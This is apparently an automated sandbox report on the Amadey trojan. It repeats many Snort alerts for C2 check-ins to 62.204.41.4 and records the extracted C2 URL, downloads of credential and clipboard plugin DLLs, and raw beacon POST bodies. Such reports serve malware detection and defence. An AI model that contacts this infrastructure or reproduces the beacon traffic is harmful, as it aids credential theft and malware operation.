                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50035 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50036 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50037 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50038 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50039 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50040 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50041 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50042 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50043 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50044 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50045 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50046 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50047 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50048 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50049 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50050 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50051 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50052 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50053 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50054 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50055 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50056 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50057 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50058 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50059 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50060 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50061 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50062 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50063 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50064 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50065 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50066 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50067 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50068 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50069 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50070 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50071 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50072 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50073 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50074 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50075 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50076 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50077 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50078 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50079 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50080 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50081 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50082 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50083 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50084 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50085 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50086 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50087 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50088 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50089 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50090 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50091 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50092 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50093 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50094 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50095 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50096 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50097 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50098 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50099 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50100 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50101 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50102 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50103 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50104 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50105 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50106 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50107 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50108 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50109 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50110 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50111 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50112 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50113 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50114 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50115 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50116 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50117 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50118 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50119 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50120 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50121 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50122 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50123 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50124 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50125 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50126 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50127 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50128 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50129 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50130 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50131 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50132 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50133 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50134 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50135 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50136 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50137 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50139 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50140 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50141 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50142 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50143 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50144 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50145 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50146 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50147 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50148 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50149 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50150 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50151 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50152 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50153 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50154 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50155 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50156 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50157 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50158 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50159 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50160 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50161 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50162 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50163 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50164 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50165 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50166 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50167 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50168 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50169 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50170 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50171 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50172 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50173 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50174 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50175 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50176 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50177 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50178 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50179 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50180 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50181 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50182 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50183 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50184 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50185 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50186 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50187 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50188 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50189 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50190 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50191 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50192 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50194 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50195 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50196 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50197 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50198 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50199 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50200 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50201 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50202 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50203 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50204 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50205 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50206 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50207 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50208 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50209 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50210 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50211 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50212 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50213 -> 62.204.41.4:80
                            Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
